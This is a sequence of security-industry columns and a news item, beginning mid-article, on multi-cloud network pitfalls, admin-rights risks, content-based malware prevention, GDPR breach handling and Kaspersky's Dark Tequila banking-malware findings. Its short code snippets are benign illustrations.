We can go one level deeper into the network. AWS virtual private cloud (VPC) subnets can be either private or public; a subnet is public if its route table routes traffic to an internet gateway (IGW). Only public subnets allow resources deployed in them to access the internet. An Azure VNet does not have private or public subnets; resources connected to a VNet have access to the Internet by default. An engineer who is used to AWS relies on private subnets to block instances from accessing the internet; when creating a DR site on Azure, however, the engineer needs to deny internet access explicitly. Context-switching issues can be hazardous.
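As a rough illustration, the public-versus-private classification in AWS comes down to a route-table check. The sketch below uses hypothetical route entries; a real implementation would query the EC2 API rather than a dictionary:

```python
# Sketch: classify AWS VPC subnets as public or private by whether their
# route table sends the default route (0.0.0.0/0) to an internet
# gateway (IGW). Route entries here are illustrative.
route_tables = {
    "subnet-a": [{"dest": "10.0.0.0/16", "target": "local"},
                 {"dest": "0.0.0.0/0", "target": "igw-123"}],
    "subnet-b": [{"dest": "10.0.0.0/16", "target": "local"}],
}

def is_public(subnet_id):
    return any(r["dest"] == "0.0.0.0/0" and r["target"].startswith("igw-")
               for r in route_tables[subnet_id])

print(is_public("subnet-a"), is_public("subnet-b"))  # True False
```

No equivalent check exists on an Azure VNet, which is precisely why the AWS habit of "no IGW route means no internet" does not transfer.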
Another complication in AWS networking is related to network access control lists (NACLs). NACLs operate at the subnet level, examining traffic entering and exiting the subnet, while SGs operate at the VM (actually, the Elastic Network Interface) level. NACLs are stateless, meaning that even if ingress traffic is allowed, the response is not automatically allowed unless it is explicitly permitted by the subnet's rules. The following diagram provided by AWS explains the flow of traffic across the different security layers.
Azure and GCP do not use the concept of NACL, so engineers who migrate from those platforms to AWS often find themselves puzzled as to why traffic is blocked, even if it is clearly allowed by the SGs.
A few recommendations
The examples we have explored are only a taste of the real experiences and challenges that multi-cloud solutions bring. Becoming an expert in one cloud platform takes a lot of time, and working with multiple clouds at the same time is harder still, leaving teams prone to errors. To reduce risk, you can follow a few recommendations:
- Automate processes. Manual changes are prone to errors; automation can reduce the chance of making mistakes.
- Employ a cross-cloud system. A solution that provides a level of abstraction and a similar experience across different cloud platforms can eliminate context-switching issues.
- Adopt a change-review mechanism.
About the author: Zohar Alon is the Founder and CEO of Dome9 Security, and a veteran in networking security. He helped shape the early days of network security while at Check Point Software, where he built Provider-1.
All threat actors know that the day they gain access to an account with full administrative rights, they've hit a goldmine. It only takes one weak endpoint for an attacker to have free rein over an entire corporate network. The 2016 Forrester Wave on Privileged Identity Management revealed that 80 percent of all data breaches involve the use of privileged credentials in one way or another. As cyber risks continue to evolve, understanding the risks associated with full admin privileges and limiting their unnecessary use is essential for organisations of every size, in every sector.
Reducing administrator rights should form the foundation of any organisation’s security strategy or processes to ensure secure access to system controls. Yet many companies are still not putting appropriate measures in place to counter the threat, purely due to the lack of understanding around the risks of over-privileged accounts. Therefore, it is vital for organisations and employees to be aware of some of the common ways that full administrator rights can pose a threat to security.
Access all areas
To put it simply, when user accounts have admin rights, it enables the end-user to install new software, add accounts and change the way systems operate. It also allows users to own any file on the network – privileges always beat permissions. From there, admin users can change ownership of relevant documents or folders and either restrict access, copy or transfer sensitive data without other authority, or potentially alter protected security policies.
With direct access to specific registry keys, admin rights allow users to work around Group Policy Object settings and other built-in central management policies. And with the freedom to create new accounts and set privilege levels, a compromised local administrator account can open the door to both malicious users and their accomplices.
Once you’re in, you’re in
Once a malicious individual gains access to a user's desktop, they can turn their attention to widening the net and compromising an entire corporate network. Malicious users will not only have free rein over any part of the operating system or network, but can also lay traps for users with higher privileges, such as domain admins, to gain further access to highly sensitive data.
Having unrestricted admin rights in place, therefore, poses a significant risk of privilege escalation attacks and lateral movement. The ability to manage certificates for a local machine means admin users – or those impersonating them – also risk exposing others to phishing and man-in-the-middle attacks. By installing a fake certificate authority, malicious users can trick others into believing they are visiting trusted sites or receiving information from a trusted source, which could lead to sensitive information being leaked, or the installation of malware that could infect an entire system.
Port scanning and traffic capture tools are often used legitimately by businesses to monitor their networks, and admin rights allow anyone to install them. When this privilege falls into the wrong hands, it allows malicious users to identify and exploit key weaknesses in the corporate system.
Gone without a trace
The threats that come from admin rights aren’t all external – employees can also pose a danger to themselves and the organisation. The freedom to install, update or remove any application or software can inadvertently leave the IT environment open to vulnerabilities. End users do not necessarily know the full implications of their actions, and this lack of awareness can pose a serious risk to system stability and data security.
For example, applications can be configured to run bypassing User Account Control protocols, and processes can be run as System too, meaning that malicious software can be embedded and set to trigger in future, running in the background alongside existing applications.
The ability to make any change within an IT system also offers cyber-criminals the ability to cover their tracks. They can delete application, system and security event logs to conceal any wrongdoing with relative ease, leaving organisations completely clueless about how their business and sensitive information was compromised.
Whichever way you frame it, once a hacker finds a way to infiltrate an endpoint with full administrator privileges, they can very easily cast their net much further and bring down an entire network if they please. The best ones out there can even remain undetected.
According to Gartner Vice President and Distinguished Analyst Neil MacDonald, privileged account management should be one of the top priorities for CISOs when it comes to security. It's important that IT leaders balance this whilst empowering users to complete their work efficiently, and this is where restricting the privileges of your users can play a crucial role. A culture of awareness around cyber threats, alongside least privilege, means organisations can strengthen their security posture without limiting the agility of day-to-day operations. Understanding the positive effect this can have is a must. Implementing least privilege protects what's most valuable to an organisation: its reputation and its sensitive data.
About the author: Andrew has been a fundamental part of the Avecto story since its inception in 2008. As COO, Andrew is responsible for Avecto's end-to-end customer journey, leading the global consultancy divisions of pre-sales, post-sales and training, as well as customer success, support and IT.
We have seen disruptions affect every industry over the past century and more: from chemical photography to digital photography, from horse-drawn carriages to supersonic flight, from shovels to hydraulic excavators, from the telegraph to the telephone and, of course, from manual computation to modern computers and smartphones, which in turn gave rise to the likes of Uber, Facebook and Twitter for even more disruption.
So, why is it that we tend to scoff when a cyber security disruption is brought to our attention?
Effective Cyber Protection
Is good really good enough when your productivity, profitability and corporate reputation are at stake? What defines effective? At one point, detecting a signature and preventing future occurrences of it was considered effective. Then the introduction of behavior-based technologies like sandboxes allowed malware to be detonated in secure, quarantined areas so that production environments would not be affected.
Even newer approaches, such as Content Disarm and Reconstruction (CDR), provide variations on existing, well-known (and spoofable) approaches. So, by definition, the only truly effective cyber protection solution is one that can prevent zero-day malware without the need for long delays or costly resources.
Evolving to Disruption
Content, whether through datafiles or data streams, is one of the most common and pervasive methods by which malware infiltrates an enterprise. Current security approaches cannot ensure that incoming network-based content is free of malware because they fail to identify, let alone prevent, zero-day malware and unknown threats hidden in content. Moreover, such approaches are resource intensive, slow and evadable - all of which affect an enterprise’s bottom line and profitability.
What is needed today is evasion-proof, instantaneous, end-to-end security for any kind of network-based non-executable content across a variety of persistently used attack vectors such as email, web, and cloud file-sharing applications. Put more simply, we have been evolving various security techniques but are now at a crossroads where only disruption will deliver the impact necessary to truly prevent cyber threats rather than merely remediate them.
Modern Cyber Protection
To be truly modern, your cyber prevention solution should deliver instantaneous, end-to-end security for any kind of network-based non-executable content across a variety of persistently used attack vectors such as email, web, and cloud file-sharing applications, challenging norms that rely on slow, costly and mostly outdated, ineffective methods of sandboxing, signatures and behavioral inspection.
Really, it's quite simple: executable code in any type of non-executable content, such as datafiles and datastreams, is malware and should not be permitted to enter any organization. At bottom, the solution should determine whether content is infected (quarantine) or not (clean). There should be no behavioral analysis or guesswork, so you can prevent cyber threats instead of remediating the damage.
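As a toy illustration of that principle, the sketch below flags content that begins with a well-known executable header. The magic bytes shown are standard, but real products parse file formats far more deeply; this is not how any particular vendor implements detection:

```python
# A minimal sketch of the idea that executable code has no business in
# data files: flag content that carries a well-known executable header.
EXECUTABLE_MAGIC = {
    b"MZ": "Windows PE executable",
    b"\x7fELF": "Linux ELF executable",
}

def classify(content: bytes) -> str:
    for magic, label in EXECUTABLE_MAGIC.items():
        if content.startswith(magic):
            return f"quarantine ({label})"
    return "clean"

print(classify(b"MZ\x90\x00"))   # quarantine (Windows PE executable)
print(classify(b"%PDF-1.7"))     # clean
```

The binary verdict is the point: content is either infected or it is not, with no probability score to second-guess.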
Organizations should consider a solution that also protects against malware in active content and file-less malware. Active content such as macros should be de-obfuscated, no matter the level of nesting or encryption, and evaluated to determine its true purpose. Malicious scripts, links and URLs that may be hidden, self-extracting or even hosted on remote servers should be instantaneously analyzed and determined to be clean or not.
At the end of the day, companies need to look for a solution that strengthens their cyber defenses dramatically by preventing attacks before they enter and harm their organization, their customers and their brand. Remediation is costly, prevention is not.
About the author: Boris Vaynberg co-founded Solebit LABS Ltd. in 2014 and serves as its Chief Executive Officer. Mr. Vaynberg has more than a decade of experience in leading large-scale cyber- and network security projects in the civilian and military intelligence sectors.
Companies today face a huge task in dealing with the sheer volume of red tape required to demonstrate compliance. Such is the global nature of today's regulations that most organisations must adhere to them even if they are not physically present in the markets covered. This exposes them to greater compliance risk than ever before.
What makes regulatory compliance even more complex is that there is no 'one-size-fits-all'. Each regulation has a different focus, with different rules aligned to its individual purpose, sometimes with conflicting requirements. For example, financial institutions must comply with anti-money laundering (AML) and fraud regulations involving strict controls on transaction reporting. Yet AML compliance must also be in line with GDPR, which governs how customer personal data is captured, used, secured and discarded.
However, leaving the question of fines for non-compliance aside for a moment, the ultimate purpose of these regulations is not to increase workload, but to ensure data is reported accurately, to protect it from inappropriate use and to identify possible illegal activities. Unfortunately, many companies first find out that they are not adequately managing or protecting their data not through a visit from the regulators, but when they experience a data breach.
The impact of a data leak
The time period for businesses to disclose a data breach has been squeezed thanks to GDPR. Instead of waiting until two years after a breach, as had seemed an uncomfortable norm, companies now have only 72 hours from becoming aware of a breach to report it to the supervisory authority, and affected individuals must be notified without undue delay when the breach puts them at high risk. This turnaround means businesses must be much more on the ball in terms of knowledge of their data inventory and security systems.
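The arithmetic of the deadline is simple, as this small sketch with purely illustrative timestamps shows:

```python
from datetime import datetime, timedelta

# GDPR allows 72 hours from becoming aware of a breach to notify the
# supervisory authority; the timestamps here are illustrative.
aware_at = datetime(2018, 9, 3, 14, 30)
deadline = aware_at + timedelta(hours=72)

def hours_remaining(now: datetime) -> float:
    return (deadline - now).total_seconds() / 3600

print(deadline)                                       # 2018-09-06 14:30:00
print(hours_remaining(datetime(2018, 9, 5, 14, 30)))  # 24.0
```

The hard part, of course, is not the subtraction but knowing quickly enough what was breached and who is affected.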
When data leaks occur without public disclosure, severe financial and reputational consequences follow when the breach is finally disclosed, and it always is. Take, for example, the Yahoo breach and the Facebook/Cambridge Analytica debacle, which, while not a breach, involved questionable handling of private data.
Between 2013 and 2014, almost three billion Yahoo user accounts were affected in a hacking attack, making it the largest data breach in history. And yet it took over two years for the Internet firm to divulge the occurrence. The impact on Yahoo's reputation was significant and cost the company real money: not only did it face a $35 million fine from the SEC, but the incident also threatened its acquisition by Verizon, which cut the purchase price by $350 million.
While Yahoo's data breach was caused by security flaws, this year's Facebook/Cambridge Analytica scandal shows the potential damage when the use of data cascades out of control. While a complicated story, it involves the unauthorised use of personally identifiable information of up to 87 million Facebook users. While the data was harvested through permissions granted to a third-party quiz app, questions were raised about how the data was provided to Cambridge Analytica and what rights it had to use it.
Facebook’s share price dropped 8.5% and, more importantly, polls showed a 66% drop in consumer confidence in Mark Zuckerberg who was subjected to US Congressional and EU scrutiny and agreed to a wide range of changes to Facebook policies and practices. Just 28% of the Facebook users surveyed after Zuckerberg’s testimony believed the company is committed to privacy, down from a high of 79% just last year.
The lesson is that the entire extended data supply chain must be carefully managed. An organisation must know the location of its data, whether it has the right to use it, and how to afford it the requisite level of protection; it must be immediately aware when data has been breached and know the population of individuals affected. The institution must also know where its data flows and track it to ensure it is not subjected to improper or disallowed use. If an organisation fails to manage its data along this complete journey, the regulators will be the least of its worries.
Fines are, after all, typically a one-time event, and a successful company can often quickly recover from the financial setback. Reputational damage is different: it has significant public exposure, and when customers lose their trust in a brand, the company suffers financially in the long run, not just directly through loss of business but also through a drop in market value.
Businesses, large and small, are the custodians of customer data, not the owners. GDPR makes clear that individuals own their data and control its use. This means businesses must look after what is only lent to them and treat it as carefully as any other corporate asset. In other words, they must keep it safe and secure. Just think: if you were the proprietor of a bank or vault, you would not let just anyone walk in. Instead, you'd have the proper security checks in place to make sure the right people get the right information. This same mindset must also be applied to data, whether that is transactional records or a customer's personal information.
Of course, this is not a straightforward thing to do. Understanding the complex ways data travels across an organisation's many platforms and services, moves outside the organisation, and interacts with third-party web services and APIs can be an overwhelming task. But the process is necessary in order to put in place the basic recording, inventorying and reporting processes needed to maintain compliance over time.
Technology is not only helpful in this process; it is essential to achieving and maintaining compliance. Automated discovery and data lineage create and maintain transparency into processes and the data being managed. Reporting supports an "audit ready" position so supervisory authority inquiries can be answered without a fire drill, while data intelligence change detection prevents new problems from sneaking in.
Many companies are finding that a data catalog ensures any user can easily access and use data as needed. A software-driven, or intelligent, data catalog can locate even the most complex data within a data estate, ready for analysis and decision making. This enables users to spot personal information amongst new data, while a data lineage version comparison alerts them to changes in how that personal data is handled.
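A lineage version comparison can be thought of as a diff over the hops each field passes through. The sketch below uses hypothetical field and system names, not any particular catalog product's data model:

```python
# Two versions of a catalog entry mapping a personal-data field to the
# systems it flows through. The names are illustrative.
v1 = {"customer_email": ["crm_db", "marketing_export"]}
v2 = {"customer_email": ["crm_db", "marketing_export", "third_party_api"]}

def lineage_changes(old, new):
    """Flag any hop added since the previous lineage version."""
    alerts = []
    for field, hops in new.items():
        added = [h for h in hops if h not in old.get(field, [])]
        if added:
            alerts.append((field, added))
    return alerts

print(lineage_changes(v1, v2))  # [('customer_email', ['third_party_api'])]
```

An alert like this is exactly the early warning a compliance team needs: personal data has started flowing to a destination that was not in the approved lineage.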
What data a company chooses to collect, store and discard very much depends on the sector in which it operates. However, there are some steps almost any company can take, such as capturing only the information directly related to its product or service and keeping it in a limited number of databases. It is also wise to scope out how much of the data needs to be safeguarded.
When it comes to storing sensitive data specifically, simple actions like avoiding generic passwords and applying guardrails are crucial. Where one is appointed, the Data Protection Officer must oversee the process of reporting on personal data, or personally identifiable information, showing what data an organisation is responsible for, including recording and classifying protected data in the glossary so that users know what they can and can't do with it.
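A guardrail against generic passwords can be as simple as a blocklist check before a credential is ever accepted; the blocklist and length threshold below are purely illustrative:

```python
# Minimal sketch of a password guardrail: reject short or generic
# passwords before they protect sensitive data. The blocklist is
# illustrative, not a real-world deny list.
GENERIC = {"password", "admin", "123456", "welcome1"}

def acceptable(password: str) -> bool:
    return len(password) >= 12 and password.lower() not in GENERIC

print(acceptable("admin"))                         # False
print(acceptable("correct-horse-battery-staple"))  # True
```

Production systems would add breach-corpus checks and rate limiting, but even this much blocks the laziest defaults.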
Technology solutions such as Data Intelligence can go a long way to providing peace of mind here. Intelligent data analysers examine data and metadata to promote comprehensive understanding, including detailed automated data lineage for insight at a deeper level. Out-of-the-box reports assist with GDPR compliance, offering a GDPR inventory dashboard and a set of reports summarising Privacy Impact Assessments (PIAs). These, and process maps that show how protected data moves through the organisation, are critical to data security and compliance: they can show where data is vulnerable and whether and how it moves to outside processors or outside protected areas. The company will also need to record that protections are in place through model agreements and binding corporate policies.
Today’s reliance on data to fuel predictive analytics means businesses believe there is value in keeping data lakes for future business goals. However, on the whole, they need to become better at discarding what is not necessary and GDPR helps by being very specific about when information is supposed to be deleted.
Data leaks, intentional or unintentional, happen. How often they happen depends on how proficient the team is at reducing the risk. Failure to do so, as we've seen in this piece, means a company may find itself having to prove to the authorities what measures were taken to secure information, while fending off the adverse side effects of a leak, such as damage to customer loyalty and financial penalties.
About the author: Jesse Canada is an Enterprise Data Management practitioner with over 20 years in diversified financial services experience working with prestigious institutions (RBS, Citizens Bank, Citibank, and Bank of America), non-profits, and consulting services.
A recently discovered complex malicious campaign has been attempting to steal financial information and login credentials from Mexican users, and has been ongoing for at least five years, Kaspersky Lab says.
As part of the campaign, the attackers deliver a multi-stage payload to their victims, but only if specific criteria are met. For example, no infection is performed if a security suite is installed on the victim’s machine or if the malicious code detects it is being executed in an analysis environment.
Dubbed Dark Tequila, the malicious campaign targets the customers of several Mexican banking institutions, but also attempts to compromise login credentials for popular websites, including code versioning repositories, public file storage accounts and domain registrars.
According to Kaspersky, some comments embedded in the code were written in the Spanish language and use words only spoken in Latin America, suggesting that the threat actor behind it is Spanish-speaking and Latin American in origin. The attackers use spear-phishing and infected USB devices for infection.
“The threat actor behind it strictly monitors and controls all operations. If there is a casual infection, which is not in Mexico or is not of interest, the malware is uninstalled remotely from the victim’s machine,” Kaspersky explains.
Both the Dark Tequila malware and the infrastructure used as part of the campaign are highly sophisticated compared to typical financial fraud operations, the security firm reports.
“At first sight, Dark Tequila looks like any other banking Trojan, hunting information and credentials for financial gain. Deeper analysis, however, reveals a complexity of malware not often seen in financial threats,” said Dmitry Bestuzhev, head of Global Research and Analysis Team, Latin America, Kaspersky Lab.
The malicious implant has a modular design and contains all of the components needed to perform the malicious operation, with the attackers being able to decrypt and activate different modules remotely. The stolen information is sent to the attackers’ server in encrypted form.
A total of six modules were observed being used in this campaign. The first module is responsible for communication with the command and control server, while the second cleans up the system if virtualization or debugging tools are detected.
The third module acts as a keylogger and can steal information from various banking sites, flight reservation systems, Microsoft Office 365, IBM Lotus Notes clients, Zimbra email, Bitbucket, Amazon, GoDaddy, Register, Namecheap, Dropbox, Softlayer, Rackspace, and other services.
The fourth module is an information stealer that targets saved passwords in browsers and email and FTP clients, the fifth is a USB infector that copies an executable file to a targeted removable drive (thus allowing the malware to move offline, like a worm), while the sixth module is a service watchdog that makes sure the malware is running properly.
“The code’s modular structure, as well as its obfuscation and detection mechanisms, help it to avoid discovery and deliver its malicious payload only when the malware decides it is safe to do so. This campaign has been active for several years and new samples are still being found. To date, it has only attacked targets in Mexico, but its technical capability is suitable for attacking targets in any part of the world,” Bestuzhev added.
Related: Evasive Malware Now a Commodity
Related: Necurs Campaign Targets Banks